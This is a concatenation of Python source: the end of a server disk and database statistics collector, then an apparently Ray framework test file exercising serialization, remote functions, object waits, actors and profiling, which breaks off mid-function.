"disk.write-megabytes-0B": dsk_0b_wmb,
"disk.read-ops-0B": dsk_0b_rop,
"disk.write-ops-0B": dsk_0b_wop,
"disk.read_wait-time-0B": dsk_0b_rtm,
"disk.write_wait-time-0B": dsk_0b_wtm,
"disk.read-megabytes-0C": dsk_0c_rmb,
"disk.write-megabytes-0C": dsk_0c_wmb,
"disk.read-ops-0C": dsk_0c_rop,
"disk.write-ops-0C": dsk_0c_wop,
"disk.read_wait-time-0C": dsk_0c_rtm,
"disk.write_wait-time-0C": dsk_0c_wtm,
"db1.ses-count": int(db1_ses),
"db1.date_gen": date_time
}
#print statsData
updateSstore(statsData)
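# Illustrative helper only: the same integer arithmetic used inline above to
# turn byte-counter deltas into megabytes over the sample interval.
def bytes_to_mb(delta_bytes, interval_seconds=1):
    return delta_bytes / 1024 / 1024 / interval_seconds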
def createSstore():
# Sleep at first to start stats
time.sleep(1)
try:
# Ssids list
ssids = [
'//:class.app/company/servers//:res.server/' + hostname
]
#print ssids
# Get an instance of SStore class
ss = SStore()
# Add resources
ss.resource_add(ssids)
    except (KeyboardInterrupt, SystemExit):
        print "Caught KeyboardInterrupt, exiting"
        sys.exit(1)
def updateSstore(statsData):
try:
ssidStats = {}
for key, val in statsData.iteritems() :
ssidStats["//:class.app/company/servers//:res.server/" + hostname + "//:stat." + key] = val
# Get an instance of SStore class
ss = SStore()
# enable persistent recording of the collection
ss.enabled = True
try:
#print ssidStats
ss.data_update(ssidStats)
except:
print("Failed to update stats because {0}".format(ss.err_description))
exit(1)
# Check for warnings
for w in ss.warnings():
print("Failed to update stat {0} because {1}".format(w.id, w.description))
#print ssidStats, hostname
time.sleep(2)
    except (KeyboardInterrupt, SystemExit):
        print "Caught KeyboardInterrupt, exiting"
        sys.exit(1)
def chkDb():
while True:
qryTime()
def chkStats():
while True:
statTime()
if __name__=='__main__':
createSstore()
p1 = Process(target = chkStats)
p1.start()
p2 = Process(target = chkDb)
p2.start()
|
runtest.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import logging
import os
import re
import setproctitle
import string
import subprocess
import sys
import threading
import time
from collections import defaultdict, namedtuple, OrderedDict
import numpy as np
import pytest
import ray
import ray.ray_constants as ray_constants
import ray.test.cluster_utils
import ray.test.test_utils
logger = logging.getLogger(__name__)
def assert_equal(obj1, obj2):
module_numpy = (type(obj1).__module__ == np.__name__
or type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ())
or (hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently np.testing.assert_equal
# fails because we do not properly handle different numerical
# types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) == set(
list(obj2.__dict__.keys()) + special_keys)), ("Objects {} "
"and {} are "
"different.".format(
obj1, obj2))
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (ray.serialization.is_named_tuple(type(obj1))
or ray.serialization.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), ("Objects {} and {} are named tuples "
"with different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, "Objects {} and {} are different.".format(
obj1, obj2)
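# Quick illustration (not a test): plain `==` on numpy arrays returns an array,
# so the recursive assert_equal above is what allows nested containers holding
# arrays to be compared element-wise, e.g.
#   assert_equal({"a": np.zeros(3)}, {"a": np.zeros(3)})   # passes
#   assert_equal([np.zeros(3)], [np.ones(3)])              # raises AssertionError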
if sys.version_info >= (3, 0):
long_extras = [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
long_extras = [
long(0), # noqa: E501,F821
np.array([
["hi", u"hi"],
[1.3, long(1)] # noqa: E501,F821
])
]
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 100, 1 << 999, [1 << 100, [1 << 100]], "a",
string.printable, "\u262F", u"hello world", u"\xff\xfe\x9c\x001\x000\x00",
None, True, False, [], (), {},
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
np.zeros([100, 100]),
np.random.normal(size=[100, 100]),
np.array(["hi", 3]),
np.array(["hi", 3], dtype=object)
] + long_extras
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{"obj{}".format(i): np.random.normal(size=[100, 100])
for i in range(10)},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
(
(((((((((), ), ), ), ), ), ), ), ), ),
{
"a": {
"b": {
"c": {
"d": {}
}
}
}
}
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(PRIMITIVE_OBJECTS + COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(), Bar(), Baz()]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = namedtuple("Point", ["x", "y"])
NamedTupleExample = namedtuple("Example",
"field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [
Exception("Test object."),
CustomError(),
Point(11, y=22),
Foo(),
Bar(),
Baz(), # Qux(), SubQux(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3])
]
BASE_OBJECTS = PRIMITIVE_OBJECTS + COMPLEX_OBJECTS + CUSTOM_OBJECTS
LIST_OBJECTS = [[obj] for obj in BASE_OBJECTS]
TUPLE_OBJECTS = [(obj, ) for obj in BASE_OBJECTS]
# The check that type(obj).__module__ != "numpy" should be unnecessary, but
# otherwise this seems to fail on Mac OS X on Travis.
DICT_OBJECTS = (
[{
obj: obj
} for obj in PRIMITIVE_OBJECTS
if (obj.__hash__ is not None and type(obj).__module__ != "numpy")] + [{
0: obj
} for obj in BASE_OBJECTS] + [{
Foo(123): Foo(456)
}])
RAY_TEST_OBJECTS = BASE_OBJECTS + LIST_OBJECTS + TUPLE_OBJECTS + DICT_OBJECTS
@pytest.fixture
def ray_start():
# Start the Ray processes.
ray.init(num_cpus=1)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.fixture
def shutdown_only():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
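# Usage note (illustrative): a test opts into one of these fixtures by naming it
# as a parameter. `ray_start` provides the 1-CPU cluster initialized above, while
# `shutdown_only` is for tests that call ray.init(...) themselves and only need
# the teardown.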
def test_passing_arguments_by_value(ray_start):
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in RAY_TEST_OBJECTS:
assert_equal(obj, ray.get(f.remote(obj)))
def test_ray_recursive_objects(ray_start):
class ClassA(object):
pass
# Make a list that contains itself.
lst = []
lst.append(lst)
# Make an object that contains itself as a field.
a1 = ClassA()
a1.field = a1
# Make two objects that contain each other as fields.
a2 = ClassA()
a3 = ClassA()
a2.field = a3
a3.field = a2
# Make a dictionary that contains itself.
d1 = {}
d1["key"] = d1
# Create a list of recursive objects.
recursive_objects = [lst, a1, a2, a3, d1]
# Check that exceptions are thrown when we serialize the recursive
# objects.
for obj in recursive_objects:
with pytest.raises(Exception):
ray.put(obj)
def test_passing_arguments_by_value_out_of_the_box(ray_start):
@ray.remote
def f(x):
return x
# Test passing lambdas.
def temp():
return 1
assert ray.get(f.remote(temp))() == 1
assert ray.get(f.remote(lambda x: x + 1))(3) == 4
# Test sets.
assert ray.get(f.remote(set())) == set()
s = {1, (1, 2, "hi")}
assert ray.get(f.remote(s)) == s
# Test types.
assert ray.get(f.remote(int)) == int
assert ray.get(f.remote(float)) == float
assert ray.get(f.remote(str)) == str
class Foo(object):
def __init__(self):
pass
# Make sure that we can put and get a custom type. Note that the result
# won't be "equal" to Foo.
ray.get(ray.put(Foo))
def test_putting_object_that_closes_over_object_id(ray_start):
# This test is here to prevent a regression of
# https://github.com/ray-project/ray/issues/1317.
class Foo(object):
def __init__(self):
self.val = ray.put(0)
def method(self):
f
f = Foo()
with pytest.raises(ray.raylet.common_error):
ray.put(f)
def test_python_workers(shutdown_only):
# Test the codepath for starting workers from the Python script,
# instead of the local scheduler. This codepath is for debugging
# purposes only.
num_workers = 4
ray.worker._init(
num_cpus=num_workers,
start_workers_from_local_scheduler=False,
start_ray_local=True)
@ray.remote
def f(x):
return x
values = ray.get([f.remote(1) for i in range(num_workers * 2)])
assert values == [1] * (num_workers * 2)
def test_put_get(shutdown_only):
ray.init(num_cpus=0)
for i in range(100):
value_before = i * 10**6
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = i * 10**6 * 1.0
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = "h" * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = [1] * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
def test_custom_serializers(shutdown_only):
ray.init(num_cpus=1)
class Foo(object):
def __init__(self):
self.x = 3
def custom_serializer(obj):
return 3, "string1", type(obj).__name__
def custom_deserializer(serialized_obj):
return serialized_obj, "string2"
ray.register_custom_serializer(
Foo, serializer=custom_serializer, deserializer=custom_deserializer)
assert ray.get(ray.put(Foo())) == ((3, "string1", Foo.__name__), "string2")
class Bar(object):
def __init__(self):
self.x = 3
ray.register_custom_serializer(
Bar, serializer=custom_serializer, deserializer=custom_deserializer)
@ray.remote
def f():
return Bar()
assert ray.get(f.remote()) == ((3, "string1", Bar.__name__), "string2")
def test_serialization_final_fallback(ray_start):
pytest.importorskip("catboost")
# This test will only run when "catboost" is installed.
from catboost import CatBoostClassifier
model = CatBoostClassifier(
iterations=2,
depth=2,
learning_rate=1,
loss_function="Logloss",
logging_level="Verbose")
reconstructed_model = ray.get(ray.put(model))
assert set(model.get_params().items()) == set(
reconstructed_model.get_params().items())
def test_register_class(shutdown_only):
ray.init(num_cpus=2)
# Check that putting an object of a class that has not been registered
# throws an exception.
class TempClass(object):
pass
ray.get(ray.put(TempClass()))
# Test subtypes of dictionaries.
value_before = OrderedDict([("hello", 1), ("world", 2)])
object_id = ray.put(value_before)
assert value_before == ray.get(object_id)
value_before = defaultdict(lambda: 0, [("hello", 1), ("world", 2)])
object_id = ray.put(value_before)
assert value_before == ray.get(object_id)
value_before = defaultdict(lambda: [], [("hello", 1), ("world", 2)])
object_id = ray.put(value_before)
assert value_before == ray.get(object_id)
# Test passing custom classes into remote functions from the driver.
@ray.remote
def f(x):
return x
foo = ray.get(f.remote(Foo(7)))
assert foo == Foo(7)
regex = re.compile(r"\d+\.\d*")
new_regex = ray.get(f.remote(regex))
# This seems to fail on the system Python 3 that comes with
# Ubuntu, so it is commented out for now:
# assert regex == new_regex
# Instead, we do this:
assert regex.pattern == new_regex.pattern
# Test returning custom classes created on workers.
@ray.remote
def g():
return SubQux(), Qux()
subqux, qux = ray.get(g.remote())
assert subqux.objs[2].foo.value == 0
# Test exporting custom class definitions from one worker to another
# when the worker is blocked in a get.
class NewTempClass(object):
def __init__(self, value):
self.value = value
@ray.remote
def h1(x):
return NewTempClass(x)
@ray.remote
def h2(x):
return ray.get(h1.remote(x))
assert ray.get(h2.remote(10)).value == 10
# Test registering multiple classes with the same name.
@ray.remote(num_return_vals=3)
def j():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = []
for _ in range(5):
results += j.remote()
for i in range(len(results) // 3):
c0, c1, c2 = ray.get(results[(3 * i):(3 * (i + 1))])
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
@ray.remote
def k():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = ray.get([k.remote() for _ in range(5)])
for c0, c1, c2 in results:
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
def test_keyword_args(shutdown_only):
@ray.remote
def keyword_fct1(a, b="hello"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct2(a="hello", b="world"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct3(a, b, c="hello", d="world"):
return "{} {} {} {}".format(a, b, c, d)
ray.init(num_cpus=1)
x = keyword_fct1.remote(1)
assert ray.get(x) == "1 hello"
x = keyword_fct1.remote(1, "hi")
assert ray.get(x) == "1 hi"
x = keyword_fct1.remote(1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct1.remote(a=1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct2.remote(a="w", b="hi")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(b="hi", a="w")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(a="w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote(b="hi")
assert ray.get(x) == "hello hi"
x = keyword_fct2.remote("w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote("w", "hi")
assert ray.get(x) == "w hi"
x = keyword_fct3.remote(0, 1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(a=0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, d="hi", c="w")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, c="w")
assert ray.get(x) == "0 1 w world"
x = keyword_fct3.remote(0, 1, d="hi")
assert ray.get(x) == "0 1 hello hi"
x = keyword_fct3.remote(0, 1)
assert ray.get(x) == "0 1 hello world"
x = keyword_fct3.remote(a=0, b=1)
assert ray.get(x) == "0 1 hello world"
# Check that we cannot pass invalid keyword arguments to functions.
@ray.remote
def f1():
return
@ray.remote
def f2(x, y=0, z=0):
return
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f1.remote(3)
with pytest.raises(Exception):
f1.remote(x=3)
with pytest.raises(Exception):
f2.remote(0, w=0)
with pytest.raises(Exception):
f2.remote(3, x=3)
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f2.remote(1, 2, 3, 4)
@ray.remote
def f3(x):
return x
assert ray.get(f3.remote(4)) == 4
def test_variable_number_of_args(shutdown_only):
@ray.remote
def varargs_fct1(*a):
return " ".join(map(str, a))
@ray.remote
def varargs_fct2(a, *b):
return " ".join(map(str, b))
try:
@ray.remote
def kwargs_throw_exception(**c):
return ()
kwargs_exception_thrown = False
except Exception:
kwargs_exception_thrown = True
ray.init(num_cpus=1)
x = varargs_fct1.remote(0, 1, 2)
assert ray.get(x) == "0 1 2"
x = varargs_fct2.remote(0, 1, 2)
assert ray.get(x) == "1 2"
assert kwargs_exception_thrown
@ray.remote
def f1(*args):
return args
@ray.remote
def f2(x, y, *args):
return x, y, args
assert ray.get(f1.remote()) == ()
assert ray.get(f1.remote(1)) == (1, )
assert ray.get(f1.remote(1, 2, 3)) == (1, 2, 3)
with pytest.raises(Exception):
f2.remote()
with pytest.raises(Exception):
f2.remote(1)
assert ray.get(f2.remote(1, 2)) == (1, 2, ())
assert ray.get(f2.remote(1, 2, 3)) == (1, 2, (3, ))
assert ray.get(f2.remote(1, 2, 3, 4)) == (1, 2, (3, 4))
def test_no_args(ray_start):
    @ray.remote
    def no_op():
        pass
    ray.get(no_op.remote())
def test_defining_remote_functions(shutdown_only):
ray.init(num_cpus=3)
# Test that we can define a remote function in the shell.
@ray.remote
def f(x):
return x + 1
assert ray.get(f.remote(0)) == 1
# Test that we can redefine the remote function.
@ray.remote
def f(x):
return x + 10
while True:
val = ray.get(f.remote(0))
assert val in [1, 10]
if val == 10:
break
else:
logger.info("Still using old definition of f, trying again.")
# Test that we can close over plain old data.
data = [
np.zeros([3, 5]), (1, 2, "a"), [0.0, 1.0, 1 << 62], 1 << 60, {
"a": np.zeros(3)
}
]
@ray.remote
def g():
return data
ray.get(g.remote())
# Test that we can close over modules.
@ray.remote
def h():
return np.zeros([3, 5])
assert_equal(ray.get(h.remote()), np.zeros([3, 5]))
@ray.remote
def j():
return time.time()
ray.get(j.remote())
# Test that we can define remote functions that call other remote
# functions.
@ray.remote
def k(x):
return x + 1
@ray.remote
def k2(x):
return ray.get(k.remote(x))
@ray.remote
def m(x):
return ray.get(k2.remote(x))
assert ray.get(k.remote(1)) == 2
assert ray.get(k2.remote(1)) == 2
assert ray.get(m.remote(1)) == 2
def test_submit_api(shutdown_only):
ray.init(num_cpus=1, num_gpus=1, resources={"Custom": 1})
@ray.remote
def f(n):
return list(range(n))
@ray.remote
def g():
return ray.get_gpu_ids()
assert f._remote([0], num_return_vals=0) is None
id1 = f._remote(args=[1], num_return_vals=1)
assert ray.get(id1) == [0]
id1, id2 = f._remote(args=[2], num_return_vals=2)
assert ray.get([id1, id2]) == [0, 1]
id1, id2, id3 = f._remote(args=[3], num_return_vals=3)
assert ray.get([id1, id2, id3]) == [0, 1, 2]
assert ray.get(
g._remote(
args=[], num_cpus=1, num_gpus=1,
resources={"Custom": 1})) == [0]
infeasible_id = g._remote(args=[], resources={"NonexistentCustom": 1})
ready_ids, remaining_ids = ray.wait([infeasible_id], timeout=50)
assert len(ready_ids) == 0
assert len(remaining_ids) == 1
@ray.remote
class Actor(object):
def __init__(self, x, y=0):
self.x = x
self.y = y
def method(self, a, b=0):
return self.x, self.y, a, b
def gpu_ids(self):
return ray.get_gpu_ids()
a = Actor._remote(
args=[0], kwargs={"y": 1}, num_gpus=1, resources={"Custom": 1})
id1, id2, id3, id4 = a.method._remote(
args=["test"], kwargs={"b": 2}, num_return_vals=4)
assert ray.get([id1, id2, id3, id4]) == [0, 1, "test", 2]
def test_get_multiple(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
assert ray.get(object_ids) == list(range(10))
# Get a random choice of object IDs with duplicates.
indices = list(np.random.choice(range(10), 5))
indices += indices
results = ray.get([object_ids[i] for i in indices])
assert results == indices
def test_get_multiple_experimental(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
object_ids_tuple = tuple(object_ids)
assert ray.experimental.get(object_ids_tuple) == list(range(10))
object_ids_nparray = np.array(object_ids)
assert ray.experimental.get(object_ids_nparray) == list(range(10))
def test_get_dict(shutdown_only):
ray.init(num_cpus=1)
d = {str(i): ray.put(i) for i in range(5)}
for i in range(5, 10):
d[str(i)] = i
result = ray.experimental.get(d)
expected = {str(i): i for i in range(10)}
assert result == expected
def test_wait(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
ready_ids, remaining_ids = ray.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
ready_ids, remaining_ids = ray.wait(objectids, num_returns=4)
assert set(ready_ids) == set(objectids)
assert remaining_ids == []
objectids = [f.remote(0.5), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=1750, num_returns=4)
assert time.time() - start_time < 2
assert len(ready_ids) == 3
assert len(remaining_ids) == 1
ray.wait(objectids)
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=5000)
assert time.time() - start_time < 5
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
# Verify that calling wait with duplicate object IDs throws an
# exception.
x = ray.put(1)
with pytest.raises(Exception):
ray.wait([x, x])
# Make sure it is possible to call wait with an empty list.
ready_ids, remaining_ids = ray.wait([])
assert ready_ids == []
assert remaining_ids == []
# Test semantics of num_returns with no timeout.
oids = [ray.put(i) for i in range(10)]
(found, rest) = ray.wait(oids, num_returns=2)
assert len(found) == 2
assert len(rest) == 8
# Verify that incorrect usage raises a TypeError.
x = ray.put(1)
with pytest.raises(TypeError):
ray.wait(x)
with pytest.raises(TypeError):
ray.wait(1)
with pytest.raises(TypeError):
ray.wait([1])
def test_wait_iterables(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
objectids = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ID.
ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ID.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ID
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ID all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(shutdown_only):
ray.init(num_cpus=1)
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
def f():
with ray.profile(
"custom_event",
extra_data={"name": "custom name"}) as ray_prof:
ray_prof.set_attribute("key", "value")
ray.put(1)
object_id = f.remote()
ray.wait([object_id])
ray.get(object_id)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
if time.time() - start_time > timeout_seconds:
raise Exception("Timed out while waiting for information in "
"profile table.")
profile_data = ray.global_state.chrome_tracing_dump()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"worker_idle",
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
@pytest.fixture()
def ray_start_cluster():
cluster = ray.test.cluster_utils.Cluster()
yield cluster
# The code after the yield will run as teardown code.
ray.shutdown()
cluster.shutdown()
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_ids = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_id in object_ids:
ray.get([
f._remote(args=[object_id], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.global_state.chrome_tracing_object_transfer_dump()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(shutdown_only):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
ray.init(num_cpus=1)
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g():
return 2
@ray.remote # noqa: F811
def g():
return 3
@ray.remote # noqa: F811
def g():
return 4
@ray.remote # noqa: F811
def g():
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(shutdown_only):
ray.init(num_cpus=1)
# Verify that we cannot call put on an ObjectID.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
def test_multithreading(shutdown_only):
    # This test requires at least 2 CPUs to finish since the worker does not
    # release resources when joining the threads.
ray.init(num_cpus=2)
@ray.remote
def f():
pass
def g(n):
for _ in range(1000 // n):
ray.get([f.remote() for _ in range(n)])
res = [ray.put(i) for i in range(1000 // n)]
ray.wait(res, len(res))
def test_multi_threading():
threads = [
threading.Thread(target=g, args=(n, ))
for n in [1, 5, 10, 100, 1000]
]
[thread.start() for thread in threads]
[thread.join() for thread in threads]
@ray.remote
def test_multi_threading_in_worker():
test_multi_threading()
def block(args, n):
ray.wait(args, num_returns=n)
ray.get(args[:n])
@ray.remote
class MultithreadedActor(object):
def __init__(self):
pass
def spawn(self):
objects = [f.remote() for _ in range(1000)]
self.threads = [
threading.Thread(target=block, args=(objects, n))
for n in [1, 5, 10, 100, 1000]
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
# test multi-threading in the driver
test_multi_threading()
# test multi-threading in the worker
ray.get(test_multi_threading_in_worker.remote())
# test multi-threading in the actor
a = MultithreadedActor.remote()
ray.get(a.spawn.remote())
ray.get(a.join.remote())
def test_free_objects_multi_node(shutdown_only):
# This test will do following:
# 1. Create 3 raylets that each hold an actor.
# 2. Each actor creates an object which is the deletion target.
# 3. Invoke 64 methods on each actor to flush plasma client.
# 4. After flushing, the plasma client releases the targets.
# 5. Check that the deletion targets have been deleted.
# Caution: if remote functions are used instead of actor methods,
# one raylet may create more than one worker to execute the
# tasks, so the flushing operations may be executed in different
# workers and the plasma client holding the deletion target
# may not be flushed.
config = json.dumps({"object_manager_repeated_push_delay_ms": 1000})
ray.worker._init(
start_ray_local=True,
num_local_schedulers=3,
num_cpus=[1, 1, 1],
resources=[{
"Custom0": 1
}, {
"Custom1": 1
}, {
"Custom2": 1
}],
_internal_config=config)
@ray.remote(resources={"Custom0": 1})
class ActorOnNode0(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom1": 1})
class ActorOnNode1(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom2": 1})
class ActorOnNode2(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
def create(actors):
a = actors[0].get.remote()
b = actors[1].get.remote()
c = actors[2].get.remote()
(l1, l2) = ray.wait([a, b, c], num_returns=3)
assert len(l1) == 3
assert len(l2) == 0
return (a, b, c)
def flush(actors):
# Flush the Release History.
# Current Plasma Client Cache will maintain 64-item list.
